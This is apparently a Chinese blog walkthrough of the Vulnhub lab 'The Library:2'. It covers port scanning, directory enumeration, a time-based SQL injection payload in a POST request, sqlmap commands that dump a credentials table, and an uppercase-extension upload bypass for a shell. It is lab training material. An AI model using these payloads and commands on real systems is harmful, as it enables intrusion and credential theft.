zoukankan      html  css  js  c++  java
  • The Library:2 Vulnhub Walkthrough

    主机层面扫描探测:

    ╰─ nmap -p1-65535 -sV -A 10.10.202.132

    Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 09:10 CST
    Nmap scan report for 10.10.202.132
    Host is up (0.00087s latency).
    Not shown: 55531 filtered ports, 10002 closed ports
    PORT STATE SERVICE VERSION
    21/tcp open ftp vsftpd 3.0.3
    80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Apache2 Ubuntu Default Page: It works
    MAC Address: 00:0C:29:07:37:5D (VMware)
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.10 - 4.11
    Network Distance: 1 hop
    Service Info: OS: Unix

    web目录枚举

    ╰─ dirb http://10.10.202.132 -X.php

    ---- Scanning URL: http://10.10.202.132/ ----
    + http://10.10.202.132/library.php (CODE:200|SIZE:1546)

    http://10.10.202.132/library.php

    http://10.10.202.132/library.php?country=Netherlands #true

    http://10.10.202.132/library.php?country=Netherlands' #false

    验证是否存在注入漏洞

    经过尝试,需要更改HTTP的请求方式为:POST

    POST /library.php HTTP/1.1
    Host: 10.10.202.132
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: PHPSESSID=sklv0krnnccv6ugcvp568fdqo7
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 62

    country=England' and if(substr(@@version,1,1)=5,sleep(5),1)--+

    复制到文本文件,使用SQLmap 进行注入

    ╰─ sqlmap -r target.txt --risk 3 --level 5 --batch

    ╰─ sqlmap -r target.txt --risk 3 --level 5 --batch --tables -D library -T access -C password,service,username --dump

    AroundTheWorld | ftp     | globus

    上传php后缀无法上传,更改后缀为PHP,成功绕过上传限制

    http://10.10.202.132/shell.PHP 

    本地监听

    进行提权操作

    完!

  • 相关阅读:
    slf4j绑定log4j失败
    [转]activiti5用户任务分配
    关于ajax提交的公共接口的一大用处
    jQuery插件开发方式
    centos7安装mysql
    Centos7安装JDK
    奇葩问题:spring+mybaits项目突然出现其中一些Mapper类找不到
    JAVA多线程下,获取递增的序列号
    库存扣减的流水账记录问题
    My97DatePicker使用的问题
  • 原文地址:https://www.cnblogs.com/hack404/p/11381629.html
Copyright © 2011-2022 走看看